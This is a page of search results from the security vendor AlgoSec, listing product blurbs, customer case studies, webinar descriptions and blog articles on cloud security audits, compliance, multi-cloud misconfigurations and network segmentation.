top of page

Search results

626 results found with an empty search

  • Prevasio sandbox 'Detonates' containers in a safe virtual environment | AlgoSec

    Enhance container security with Prevasio's sandbox. Isolate and "detonate" containers in a safe environment to uncover hidden threats and prevent breaches. Prevasio sandbox 'Detonates' containers in a safe virtual environment ---- ------- Schedule a Demo Select a size ----- Get the latest insights from the experts A Guide to Upskilling Your Cloud Architects & Security Teams in 2023 Learn more Securing Cloud-Native Environments: Containerized Applications, Serverless Architectures, and Microservices Learn more Understanding and Preventing Kubernetes Attacks and Threats Learn more Choose a better way to manage your network

  • State of Utah | AlgoSec

    Explore Algosec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions. State of Utah Network Security Management Breaks the Service Bottleneck Organization State of Utah Industry Government Headquarters Salt Lake City, Utah, United States Download case study Share Customer
success stories "With AlgoSec, I am able to get requests completed within minutes." State government rapidly accelerates security policy changes while increasing security and compliance Background Utah is home to over three million people. It is one of America’s fastest-growing states and the fastest-growing economy by job growth in the nation. The Department of Technology Services (DTS) is the technology service provider for the executive branch of the State of Utah, providing services to Utah’s citizens. DTS supports the computing infrastructure for the state government, including 22,000 telephones, 20,000 desktop computers, 2,400 servers, 1,300 online services, monitors over 4 million visits to Utah.gov per month, and secures against more than 500 million daily IT intrusion attempts. Challenge Over forty firewall pairs and hundreds of other devices help the Department of Technology Services serve and secure the Utah government.“Before AlgoSec, it was very challenging for us to manage firewalls,” stated the department’s Director of Information Technology. Some of the challenges included: Firewall rule requests took up 70% of employees’ daily time. Agencies and staff frequently complained about slow response times, impacting their productivity while staff worked through a lengthy manual process to fulfill requests. Human errors slowed down the processes, requiring extra layers of quality assurance. Large rule request projects took several months to complete. Employee onboarding took several months. New employees could not independently support firewall request changes for the first few months after joining the team. Solutions The State of Utah was searching for a solution that provided: Automation of firewall management Actionable reports to ease compliance requirements Ease of deployment Following an in-depth evaluation, the State of Utah selected AlgoSec’s security policy management solution.“We evaluated several other products but none of them really automated at the level that we wanted,” said the director of IT. “AlgoSec’s automation really stood out.” The State of Utah chose to start with AlgoSec Firewall Analyzer (AFA) and AlgoSec FireFlow (AFF), two of the flagship products in the AlgoSec suite.AlgoSec Firewall Analyzer delivers visibility and analysis of complex network security policies across on-premise, cloud, and hybrid networks. It automates and simplifies security operations including troubleshooting, auditing, and risk analysis. Using Firewall Analyzer, the State of Utah can optimize the configuration of firewalls, and network infrastructure to ensure security and compliance. AlgoSec FireFlow enables security staff to automate the entire security policy change process from design and submission to proactive risk analysis, implementation, validation, and auditing. Its intelligent, automated workflows save time and improve security by eliminating manual errors and reducing risk. Results By using the AlgoSec Security Management solution, the State of Utah was able to accelerate their security policy management, provide better and faster service to state agencies, accelerate employee onboarding, and enhance network segmentation.Some of the benefits gained include: Fast and easy deployment – they were up and running within a few weeks. Faster turnaround to firewall requests from staff supporting agencies and priority initiatives. Reduced time to implement large rule request for projects, such as deployments, migrations, and decommissions — from months to minutes. Better knowledge sharing – hosting staff and extended staff outside of network operations get more accurate insights into firewalls and infrastructure topologies and traffic flows. This sped up troubleshooting and reduced superfluous requests covered by existing rules. Elimination of human error and rework thanks to policy automation. Accelerated employee onboarding – employees joining our network operations team are now able to fulfill firewall change requests within two weeks of starting work – down from 3 months – an 80% reduction. “I’ve been able to jump in and use AlgoSec. It’s been really intuitive” , concluded the IT director. “I am very pleased with this product! ” Schedule time with one of our experts

  • Retirement fund | AlgoSec

    Explore Algosec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions. Australia’s Leading Superannuation Provider Organization Retirement fund Industry Financial Services Headquarters Australia Download case study Share Customer
success stories "It’s very easy to let security get left behind. We want to make sure that security is not a roadblock to business performance,” said Bryce. “We need to be agile and we need to make sure we can deploy systems to better support our members. Automation can really help you see that return-on-investment." Network Security Policy Automation helps Superannuation company reduce costs to provide higher returns to members Background The company is one of Australia’s leading superannuation (pension) providers. Their job is to protect their client’s money, information, and offer long-term financial security. Challenges The company’s firewalls were managed by a Managed Service Security Provider (MSSP) and there had not been enough insight and analysis into their network over the years, leading to a bloated and redundant network infrastructure. Firewalls and infrastructure did not get the care and attention they needed. As a result, some of their challenges included: Legacy firewalls that had not been adequately maintained Difficulty identifying and quantifying network risk Lack of oversight and analysis of the changes made by their Managed Services Security Provider (MSSP) Change requests for functionality that was already covered by existing rules The Solution The customer was searching for a solution that provided: A strong local presence Repeatable and recordable change management processes As a result, the customer implemented AlgoSec. The client selected AlgoSec’s Security Policy Management Solution, which includes AlgoSec Firewall Analyzer and AlgoSec FireFlow. AlgoSec Firewall Analyzer delivers visibility and analysis of complex network security policies across on-premise, cloud, and hybrid networks. It automates and simplifies security operations including troubleshooting, auditing, and risk analysis. Using Firewall Analyzer, they can optimize the configuration of firewalls, and network infrastructure to ensure security and compliance. AlgoSec FireFlow enables security staff to automate the entire security policy change process from design and submission to proactive risk analysis, implementation, validation, and auditing. Its intelligent, automated workflows save time and improve security by eliminating manual errors and reducing risk. The Results “Straight away, we were able to see a return-on-investment,” said Stefan Bryce, Security Manager, a leading Australian superannuation provider. By using the AlgoSec Security Management Solution, the customer gained: Greater insight and oversight into their firewalls and other network devices Identification of risky rules and other holes in their network security policy. Easier cleanup process due to greater visibility Audits and accountability into their network security policy changes. They were able to ensure ongoing compliance and make sure that rules submitted did not introduce additional risk Identification and elimination of duplicate rules Faster implementation of policy changes Business agility and innovation because employees are better motivated to make changes due to seamless policy change process. Consolidation of their virtual firewall internal infrastructure Reduced ongoing costs to their MSSP Schedule time with one of our experts

  • Master the Zero Trust strategy for improved cybersecurity | AlgoSec

    Learn best practices to secure your cloud environment and deliver applications securely Webinars Master the Zero Trust strategy for improved cybersecurity Learn how to implement zero trust security into your business In today’s digital world, cyber threats are becoming more complex and sophisticated. Businesses must adopt a proactive approach to cybersecurity to protect their sensitive data and systems. This is where zero trust security comes in – a security model that requires every user, device, and application to be verified before granting access. If you’re looking to implement zero trust security in your business or want to know more about how it works, you’ll want to watch this webinar. AlgoSec co-Founder and CTO Avishai Wool will discuss the benefits of zero trust security and provide you with practical tips on how to implement this security model in your organization. March 15, 2023 Prof. Avishai Wool CTO & Co Founder AlgoSec Relevant resources Protecting Your Network’s Precious Jewels with Micro-Segmentation, Kyle Wickert, AlgoSec Watch Video Professor Wool - Introduction to Microsegmentation Watch Video Five Practical Steps to Implementing a Zero-Trust Network Keep Reading Choose a better way to manage your network Choose a better way to manage your network Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • AlgoSec | 5 Multi-Cloud Environments

    Top 5 misconfigurations to avoid for robust security Multi-cloud environments have become the backbone of modern enterprise IT, offering unparalleled flexibility, scalability, and access to a diverse array of innovative services. This distributed architecture empowers organizations to avoid vendor lock-in, optimize costs, and leverage specialized functionalities from different providers. However, this very strength introduces a significant challenge: increased complexity in security... Cloud Security 5 Multi-Cloud Environments Iris Stein 2 min read Iris Stein Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 6/23/25 Published Top 5 misconfigurations to avoid for robust security Multi-cloud environments have become the backbone of modern enterprise IT, offering unparalleled flexibility, scalability, and access to a diverse array of innovative services. This distributed architecture empowers organizations to avoid vendor lock-in, optimize costs, and leverage specialized functionalities from different providers. However, this very strength introduces a significant challenge: increased complexity in security management. The diverse security models, APIs, and configuration nuances of each cloud provider, when combined, create a fertile ground for misconfigurations. A single oversight can cascade into severe security vulnerabilities, lead to compliance violations, and even result in costly downtime and reputational damage. At AlgoSec, we have extensive experience in navigating the intricacies of multi-cloud security. Our observations reveal recurring patterns of misconfigurations that undermine even the most well-intentioned security strategies. To help you fortify your multi-cloud defences, we've compiled the top five multi-cloud misconfigurations that organizations absolutely must avoid. 1. Over-permissive policies: The gateway to unauthorized access One of the most pervasive and dangerous misconfigurations is the granting of overly broad or permissive access policies. In the rush to deploy applications or enable collaboration, it's common for organizations to assign excessive permissions to users, services, or applications. This "everyone can do everything" approach creates a vast attack surface, making it alarmingly easy for unauthorized individuals or compromised credentials to gain access to sensitive resources across your various cloud environments. The principle of least privilege (PoLP) is paramount here. Every user, application, and service should only be granted the minimum necessary permissions to perform its intended function. This includes granular control over network access, data manipulation, and resource management. Regularly review and audit your Identity and Access Management (IAM) policies across all your cloud providers. Tools that offer centralized visibility into entitlements and highlight deviations can be invaluable in identifying and rectifying these critical vulnerabilities before they are exploited. 2. Inadequate network segmentation: Lateral movement made easy In a multi-cloud environment, a flat network architecture is an open invitation for attackers. Without proper network segmentation, a breach in one part of your cloud infrastructure can easily lead to lateral movement across your entire environment. Mixing production, development, and sensitive data workloads within the same network segment significantly increases the risk of an attacker pivoting from a less secure development environment to a critical production database. Effective network segmentation involves logically isolating different environments, applications, and data sets. This can be achieved through Virtual Private Clouds (VPCs), subnets, security groups, network access control lists (NACLs), and micro-segmentation techniques. The goal is to create granular perimeters around critical assets, limiting the blast radius of any potential breach. By restricting traffic flows between different segments and enforcing strict ingress and egress rules, you can significantly hinder an attacker's ability to move freely within your cloud estate. 3. Unsecured storage buckets: A goldmine for data breaches Cloud storage services, such as Amazon S3, Azure Blob Storage, and Google Cloud Storage, offer incredible scalability and accessibility. However, their misconfiguration remains a leading cause of data breaches. Publicly accessible storage buckets, often configured inadvertently, expose vast amounts of sensitive data to the internet. This includes customer information, proprietary code, intellectual property, and even internal credentials. It is imperative to always double-check and regularly audit the access controls and encryption settings of all your storage buckets across every cloud provider. Implement strong bucket policies, restrict public access by default, and enforce encryption at rest and in transit. Consider using multifactor authentication for access to storage, and leverage tools that continuously monitor for publicly exposed buckets and alert you to any misconfigurations. Regular data classification and tagging can also help in identifying and prioritizing the protection of highly sensitive data stored in the cloud. 4. Lack of centralized visibility: Flying blind in a complex landscape Managing security in a multi-cloud environment without a unified, centralized view of your security posture is akin to flying blind. The disparate dashboards, logs, and security tools provided by individual cloud providers make it incredibly challenging to gain a holistic understanding of your security landscape. This fragmented visibility makes it nearly impossible to identify widespread misconfigurations, enforce consistent security policies across different clouds, and respond effectively and swiftly to emerging threats. A centralized security management platform is crucial for multi-cloud environments. Such a platform should provide comprehensive discovery of all your cloud assets, enable continuous risk assessment, and offer unified policy management across your entire multi-cloud estate. This centralized view allows security teams to identify inconsistencies, track changes, and ensure that security policies are applied uniformly, regardless of the underlying cloud provider. Without this overarching perspective, organizations are perpetually playing catch-up, reacting to incidents rather than proactively preventing them. 5. Neglecting Shadow IT: The unseen security gaps Shadow IT refers to unsanctioned cloud deployments, applications, or services that are used within an organization without the knowledge or approval of the IT or security departments. While seemingly innocuous, shadow IT can introduce significant and often unmanaged security gaps. These unauthorized resources often lack proper security configurations, patching, and monitoring, making them easy targets for attackers. To mitigate the risks of shadow IT, organizations need robust discovery mechanisms that can identify all cloud resources, whether sanctioned or not. Once discovered, these resources must be brought under proper security governance, including regular monitoring, configuration management, and adherence to organizational security policies. Implementing cloud access security brokers (CASBs) and network traffic analysis tools can help in identifying and gaining control over shadow IT instances. Educating employees about the risks of unauthorized cloud usage is also a vital step in fostering a more secure multi-cloud environment. Proactive management with AlgoSec Cloud Enterprise Navigating the complex and ever-evolving multi-cloud landscape demands more than just awareness of these pitfalls; it requires deep visibility and proactive management. This is precisely where AlgoSec Cloud Enterprise excels. Our solution provides comprehensive discovery of all your cloud assets across various providers, offering a unified view of your entire multi-cloud estate. It enables continuous risk assessment by identifying misconfigurations, policy violations, and potential vulnerabilities. Furthermore, AlgoSec Cloud Enterprise empowers automated policy enforcement, ensuring consistent security postures and helping you eliminate misconfigurations before they can be exploited. By providing this robust framework for security management, AlgoSec helps organizations maintain a strong and resilient security posture in their multi-cloud journey. Stay secure out there! The multi-cloud journey offers immense opportunities, but only with diligent attention to security and proactive management can you truly unlock its full potential while safeguarding your critical assets. Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • AlgoSec | Continuous compliance monitoring best practices 

    As organizations respond to an ever-evolving set of security threats, network teams are scrambling to find new ways to keep up with... Auditing and Compliance Continuous compliance monitoring best practices Tsippi Dach 2 min read Tsippi Dach Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 3/19/23 Published As organizations respond to an ever-evolving set of security threats, network teams are scrambling to find new ways to keep up with numerous standards and regulations to dodge their next compliance audit violation. Can this nightmare be avoided? Yes, and it’s not as complex as one might think if you take a “compliance first” approach . It may not come as a surprise to many, but the number of cyber attacks is increasing every year and with it the risk to companies’ financial, organizational, and reputational standing. What’s at stake? The stakes are high when it comes to cyber security compliance. A single data breach can result in massive financial losses, damage to a company’s reputation, and even jail time for executives. Data breaches: Data breaches are expensive and becoming even more so by the day. According to the Ponemon Institute’s 2022 Cost of a Data Breach Report , the average cost of a data breach is $4.35 million. Fraud: Identity fraud is one of the most pressing cybersecurity threats today. In large organizations, the scale of fraud is also usually large, resulting in huge losses causing depletion of profitability. In a recent survey done by PwC, nearly one in five organizations said that their most disruptive incident cost over $50 million*. Theft: Identity theft is on the rise and can be the first step towards compromising a business. According a study from Javelin Strategy & Research found that identity fraud costs US businesses an estimated total of $56 billion* in 2021. What’s the potential impact? The potential impact of non-compliance can be devastating to an organization. Financial penalties, loss of customers, and damage to reputation are just a few of the possible consequences. To avoid these risks, organizations must make compliance a priority and take steps to ensure that they are meeting all relevant requirements. Legal impact:  Regulatory or legal action brought against the organization or its employees that could result in fines, penalties, imprisonment, product seizures, or debarment.  Financial impact:  Negative impacts with regard to the organization’s bottom line, share price, potential future earnings, or loss of investor confidence.  Business impact:  Adverse events, such as embargos or plant shutdowns, could significantly disrupt the organization’s ability to operate.  Reputational impact:  Damage to the organization’s reputation or brand—for example, bad press or social-media discussion, loss of customer trust, or decreased employee morale.  How can this be avoided? In order to stay ahead of the ever-expanding regulatory requirements, organizations must adopt a “compliance first” approach to cyber security. This means enforcing strict compliance criteria and taking immediate action to address any violations to ensure data is protected. Some of these measures include the following: Risk assessment: Conduct ongoing monitoring of compliance posture (risk assessment) and conduct regular internal audits (ensuring adherence with regulatory and legislative requirements (HIPAA, GDPR, PCI DSS, SOX, etc.) Documentation: Enforce continuous tracking of changes and intent Annual audits: Commission 3rd party annual audits to ensure adherence with regulatory and legislative requirements (HIPAA, GDPR, PCI DSS, SOX, etc.) Conclusion and next steps Compliance violations are no laughing matter. They can result in fines, business loss, and even jail time in extreme cases. They can be difficult to avoid unless you take the right steps to avoid them. You have a complex set of rules and regulations to follow as well as numerous procedures, processes, and policies. And if you don’t stay on top of things, you can end up with a compliance violation mess that is difficult to untangle. Fortunately, there are ways to reduce the risk of being blindsided by a compliance violation mess with your organization. Now that you know the risks and what needs to be done, here are six best practices for achieving it. External links: $50 million $56 billion Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • AlgoSec | Network segmentation vs. VLAN explained

    Safeguarding the network architecture is the need of the hour. According to a study, the average cost of a data breach is at an all-time... Network Security Policy Management Network segmentation vs. VLAN explained Tsippi Dach 2 min read Tsippi Dach Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 8/9/23 Published Safeguarding the network architecture is the need of the hour. According to a study, the average cost of a data breach is at an all-time high of $4.35 million. And this figure will only increase with governments and regulators becoming ever stricter on data breaches. The go-to method IT administrators adopt to safeguard their networks is network segmentation. By segmenting a larger network into smaller chunks, it becomes much more manageable to secure the entire network. But network segmentation is a broad concept and doesn’t refer to a single procedure. In fact, there are several segmentation processes — one of them being VLAN. Instead of simplifying, this adds to the complexity. In this article, we will explain the core difference between network segmentation and VLAN and when you should opt for a particular one over the other. What is network segmentation? Let’s start with the definitions of network segmentation and VLAN. By definition, network segmentation is the practice of compartmentalizing a network according to firewall rules . In other words, it’s about dividing a computer network into subnetworks. The subnetworks, at the IP level, are known as subnets. Each of the subnets then works independently and in isolation. Think of how a nation is split into various states and provinces for better management at the local level. Running an entire nation at the federal level is too much work. In addition to subnetting, there are other segmentation options like firewall segmentation and SDN (Software Defined Network) segmentation. But for this article’s sake, we will focus on subnets since those are the most common. What is VLAN? VLAN or Virtual LAN (Virtual Local Area Network) is also a type of network segmentation approach where the main physical network is divided into multiple smaller virtual networks. The division is done logically or virtually, not requiring buying additional physical resources. The same resource is divided using computer logic. There are several benefits to dividing the parts of the network, either using VLAN segmentation or subnet techniques. Some of them are: Broadcast domain isolation Both subnets and VLAN isolate broadcast domains. This way, broadcasting network traffic is contained in a single segment instead of being exposed to the entire network. This reduces the chance of network congestion during peak hours and unnecessary server overload, thereby maximizing efficiency. Enhanced security The isolation by subnets or VLAN enhances the IT network’s security policies. This is achieved through various factors that are at play. But primarily, the creation of subnetworks makes the flat network more secure. With multiple subnetworks, you can regulate the security parameters. Thus, those subnets containing critical data (like that of healthcare) can have enhanced cybersecurity measures more than others, making them harder to crack. So, from a security perspective, both subnets and VLAN are a must. Better network management With digitization and IT modernization, the IT infrastructure is growing. Concurrently, it’s getting harder to manage them. Microsegmentation is one way of managing the ever-growing infrastructure. By segmenting, you can deploy teams to each segment, thereby strengthening their management and accountability. With the implementation of SDN, you can even configure and automate the management of some of the subnetworks. Flexibility in scalability Many network administrators face network performance and scalability issues expanding resources. The issues are a mix of technical and economical. Network segmentation offers a solution to such issues. By segmenting the entire data center network, you can choose which segments to expand and control the resources granted to each segment. This also makes scalability more economical. While both offer scalability opportunities, VLAN offers superior functionality than subnets. Reduced scope of compliance Compliance is another area that IT execs need to work on. And network segmentation, either via subnets or VLAN, can help in this regard. By having subnets, you don’t have to audit your entire segmented network as required by regulators. Just audit the necessary subnets and submit the reports to the regulators for approval. This takes far less time and costs significantly less than auditing the entire network. Differences between network segmentation and VLAN By definition, network segmentation (subnetting) and VLAN sound pretty similar. After all, there’s a division of the main network into subnetworks or smaller networks. But besides the core similarities mentioned above, there are a few critical differences. Let’s dive into the differences between the two. The primary difference between the two subnets are layer 3 divisions, while VLANs are layer 2 divisions. As you may recall, networks are layer 1 (device), layer 2 (data link), layer 3 (IP, routers), and so on, up to layer 7 (application). TCP/IP is the newer framework with four layers only. So, when you divide a network at a data link, you need to adopt VLAN. With VLAN, several networks exist on the same physical network but may not be connected to the same fiber switch. In subnets, the division occurs at IP level. Thus, the independent subnets are assigned their IP addresses and communicate with others over layer 3. Besides this significant difference, there are other dissimilarities you should know. Here’s a table to help you understand: VLAN Subnet 1 Divides the network within the same physical network using logic. Divides the IP network into multiple IP networks 2 VLANs communicate with other devices within the same LAN The communication between the subnets is carried out over layer 3 3 It is configured at the switch side It is configured at IP level 4 VLAN divisions are software-based terminology since they’re divided logically. Subnets can be both hardware- of software-based 5 VLAN provides better network access and tend to be more stable Subnets offer limited control When to adopt a subnet? There are use cases when subnets are more suited, while there are cases when you’re better off with Virtual LANs. As per the definition, you need to adopt a subnet when dividing different networks at IP level. So, if you want to create multiple IP addresses for each partition, implement subnets. The subnets are essentially networks within a network with their own IP addresses. Thus, they divide the broadcast domain and improve speed and efficiency. Subnets are also the go-to segmentation method when you need to make the sub-networks available over layer 3 to the outside world. With appropriate access control lists, anyone with an internet connection would be able to access the subnets But subnetting is also used to prevent access to a particular subnet. For example, you may want to limit access to the company’s software codebase to anyone outside the development department. So, only network devices with approved IP addresses used by the developer network are approved to access the codebase. But there are two downsides to subnets you should know. The first one is increased time complexity. When dealing with a single network, three steps are in place to reach the Process (Source Host, Destination Network, and Process). In subnets, there’s an additional step involved (Source Host, Destination Network, Subnet, Process). This extra step increases time complexity, requiring more time for data transfer and connectivity. It also affects stability. Subnetting also increases the number of IP addresses required since each subnet requires its own IP address. This can become hard to manage over time. When to adopt VLAN? Virtual LANs are internal networks within the same physical network. They interact with one another, not with other devices on the same network or outside the world. Think of VLAN as a private wireless network at home. Your neighbors don’t have access to it, but everyone in your home has. If that sounds like your desired result, you should adopt VLAN. There are three types of VLANs (basic, extended, and tagged). In basic VLAN, you assign IDs to each switch port or PCI . Once assigned, you can’t change them. Extended VLAN has more functionalities like priority-based routing. Lastly, tagged VLAN enables you to create multiple VLANs with IEEE 802.1Q. The main advantages of different VLANs over subnet are speed and stability. Since endpoints do not have to resolve IP addresses every time, they tend to be faster. But there’s a significant disadvantage to VLANs: It’s easier to breach multiple partitions if there’s a malicious injection. Without proper network security controls, it is easier to exploit vulnerabilities using malware and ransomware , putting your entire network at risk. Having ACLs (access control lists) can help in such situations. Furthermore, there are issues arising out of physical store requirements. Connecting two segments in VLAN requires you to use routers and IoT. Routers are physical devices that take up space. The more segments you create, the more routers you need to use. Over time, management can become an issue. The bottom line Both subnets and VLANs are network segmentation approaches that improve security and workload management. It’s not a given that you can’t have both. Some companies benefit from the implementation of VLAN and subnets simultaneously. But there are specific times when IT service providers prefer one over the other. Consider your requirements to select the approach that’s right for you. Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • Firewalls Ablaze? Put Out Network Security Audit & Compliance Fires | AlgoSec

    Webinars Firewalls Ablaze? Put Out Network Security Audit & Compliance Fires The growing body of regulations and standards forces enterprises to put considerable emphasis on compliance verified by ad hoc and regular auditing of security policies and controls. While regulatory and internal audits entail a wide range of security checks, network firewalls are featured prominently as they are the first line of defense of the enterprise network. Typical networks might include tens or hundreds of firewalls from multiple vendors running thousands of rules. Auditing firewalls for compliance is becoming more complex and demanding all the time. Documentation of current rules and their evolution of changes is lacking Time and resources required to find, organize and inspect all the firewall rules to determine the level of compliance is exorbitant and growing It’s time to adopt auditing’s best practices to maintain continuous compliance. Join us in this webinar to discover the Firewall Audit Checklist, the 6 best practices that will ensure successful audits and full compliance. By adopting these best practices, security teams will significantly improve their network’s security posture and reduce the pain of ensuring compliance with regulations, industry standards and corporate policies. Tal Dayan AlgoSec security expert Relevant resources Firewall audit checklist for security policy rules review Firewall audit checklist for security policy rules review See Documentation AlgoSec AppViz - Application visibility for AlgoSec Firewall Analyzer See Documentation Firewall policy management Automate firewall rule changes See Documentation Choose a better way to manage your network Choose a better way to manage your network Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • How to Manage Your Cloud Journey | AlgoSec

    Cloud management enhances visibility across a hybrid network, processes network security policy changes in minutes, and reduces configuration risks But what does effective cloud management look like Webinars How to Manage Your Cloud Journey Episode 1 of Keeping Up-to-Date with Your Network Security Securing your data was once much simpler, and has grown more complex in recent years. As the workforce becomes more distributed, so does your data. Spreading your data across multiple public and private clouds complicates your network. While data used to sit behind lock and key in guarded locations, today’s data sits in multiple locations and geographies, and is made up of multiple public clouds, private clouds and other on-premises network devices. This is why managing your cloud journey can be tiresome and complicated. Enter cloud management. Cloud management enhances visibility across a hybrid network, processes network security policy changes in minutes, and reduces configuration risks. But how can you leverage your cloud management to reap these benefits? What does effective cloud management look like, and how can you achieve it when workloads, sensitive data, and information are so widely dispersed? In this episode we’ll discuss: How to manage multiple workloads on the cloud What successful security management looks like for today’s enterprises How to achieve simple, effective security management for your hybrid network May 4, 2021 Alex Hilton Chief Executive at Cloud Industry Forum (CIF) Stephen Owen Esure Group Oren Amiram Director Product Management, Algosec Relevant resources A Pragmatic Approach to Network Security Across Your Hybrid Cloud Environment Keep Reading State of cloud security: Concerns, challenges, and incidents Read Document Choose a better way to manage your network Choose a better way to manage your network Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • AlgoSec | What is a Cloud Security Audit? (and How to Conduct One)

    Featured Snippet A cloud security audit is a review of an organization’s cloud security environment. During an audit, the security... Cloud Security What is a Cloud Security Audit? (and How to Conduct One) Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 6/23/23 Published Featured Snippet A cloud security audit is a review of an organization’s cloud security environment. During an audit, the security auditor will gather information, perform tests, and confirm whether the security posture meets industry standards. PAA: What is the objective of a cloud security audit? The main objective of a cloud security audit is to evaluate the health of your cloud environment, including any data and applications hosted on the cloud. PAA: What are three key areas of auditing in the cloud? From the list of “6 Fundamental Steps of a Cloud Security Audit.” Inspect the security posture Determine the attack surface Implement strict access controls PAA: What are the two types of security audits? Security audits come in two forms: internal and external. In internal audits, a business uses its resources and employees to conduct the investigation. In external audits, a third-party organization is hired to conduct the audit. PAA: How do I become a cloud security auditor? To become a cloud security auditor, you need a certification like the Certificate of Cloud Security Knowledge (CCSK) or Certified Cloud Security Professional (CCSP). Prior experience in IT auditing, cloud security management, and cloud risk assessment is highly beneficial. Cloud environments are used to store over 60 percent of all corporate data as of 2022. With so much data in the cloud, organizations rely on cloud security audits to ensure that cloud services can safely provide on-demand access. In this article, we explain what a cloud security audit is, its main objectives, and its benefits. We’ve also listed the six crucial steps of a cloud audit and a checklist of example actions taken during an audit. What Is a Cloud Security Audit? A cloud security audit is a review of an organization’s cloud security environment . During an audit, the security auditor will gather information, perform tests, and confirm whether the security posture meets industry standards. Cloud service providers (CSPs) offer three main types of services: Software as a Service (SaaS) Infrastructure as a Service (IaaS) Platform as a Service (PaaS) Businesses use these solutions to store data and drive daily operations. A cloud security audit evaluates a CSP’s security and data protection measures. It can help identify and address any risks. The audit assesses how secure, dependable, and reliable a cloud environment is. Cloud audits are an essential data protection measure for companies that store and process data in the cloud. An audit assesses the security controls used by CSPs within the company’s cloud environment. It evaluates the effectiveness of the CSP’s security policies and technical safeguards. Auditors identify vulnerabilities, gaps, or noncompliance with regulations. Addressing these issues can prevent data breaches and exploitation via cybersecurity attacks. Meeting mandatory compliance standards will also prevent potentially expensive fines and being blacklisted. Once the technical investigation is complete, the auditor generates a report. This report states their findings and can have recommendations to optimize security. An audit can also help save money by finding unused or redundant resources in the cloud system. Main Objectives of a Cloud Security Audit The main objective of a cloud security audit is to evaluate the health of your cloud environment, including any data and applications hosted on the cloud. Other important objectives include: Decide the information architecture: Audits help define the network, security, and systems requirements to secure information. This includes data at rest and in transit. Align IT resources: A cloud audit can align the use of IT resources with business strategies. Identify risks: Businesses can identify risks that could harm their cloud environment. This could be security vulnerabilities, data access errors, and noncompliance with regulations. Optimize IT processes: An audit can help create documented, standardized, and repeatable processes, leading to a secure and reliable IT environment. This includes processes for system ownership, information security, network access, and risk management. Assess vendor security controls: Auditors can inspect the CSP’s security control frameworks and reliability. What Are the Two Types of Cloud Security Audits? Security audits come in two forms: internal and external. In internal audits, a business uses its resources and employees to conduct the investigation. In external audits, a third-party organization is hired to conduct the audit. The internal audit team reviews the organization’s cloud infrastructure and data. They aim to identify any vulnerabilities or compliance issues. A third-party auditor will do the same during an external audit. Both types of audits provide an objective assessment of the security posture . But internal audits are rare since there is a higher chance of prejudice during analysis. Who Provides Cloud Security Audits? Cloud security assessments are provided by: Third-party auditors: Independent third-party audit firms that specialize in auditing cloud ecosystems. These auditors are often certified and experienced in CSP security policies. They also use automated and manual security testing methods for a comprehensive evaluation. Some auditing firms extend remediation support after the audit. Cloud service providers: Some cloud platforms offer auditing services and tools. These tools vary in the depth of their assessments and the features they provide to fix problems. Internal audit teams: Many organizations use internal audit teams. These teams assess the controls and processes using CSPM tools . They provide recommendations for improving security and mitigating risks. Why Cloud Security Audits Are So Important Here are eight ways in which security audits of cloud services are performed: Identify security risks: An audit can identify potential security risks. This includes weaknesses in the cloud infrastructure, apps, APIs, or data. Recognizing and fixing these risks is critical for data protection. Ensure compliance: Audits help the cloud environment comply with regulations like HIPAA, PCI DSS, and ISO 27001. Compliance with these standards is vital for avoiding legal and financial penalties. Optimize cloud processes: An audit can help create efficient processes using fewer resources. There is also a decreased risk of breakdowns or malfunctions. Manage access control: Employees constantly change positions within the company or leave. With an audit, businesses can ensure that everyone has the right level of access. For example, access is completely removed for former employees. Auditing access control verifies if employees can safely log in to cloud systems. This is done via two-step authentication, multi-factor authentication, and VPNs. Assess third-party tools: Multi-vendor cloud systems include many third-party tools and API integrations. An audit of these tools and APIs can check if they are safe. It can also ensure that they do not compromise overall security. Avoid data loss: Audits help companies identify areas of potential data loss. This could be during transfer or backup or throughout different work processes. Patching these areas is vital for data safety. Check backup safety: Cloud vendors offer services to back up company data regularly. An audit of backup mechanisms can ensure they are performed at the right frequency and without any flaws. Proactive risk management: Organizations can address potential risks before they become major incidents. Taking proactive action can prevent data breaches, system failures, and other incidents that disrupt daily operations. Save money: Audits can help remove obsolete or underused resources in the cloud. Doing this saves money while improving performance. Improve cloud security posture: Like an IT audit, a cloud audit can help improve overall data 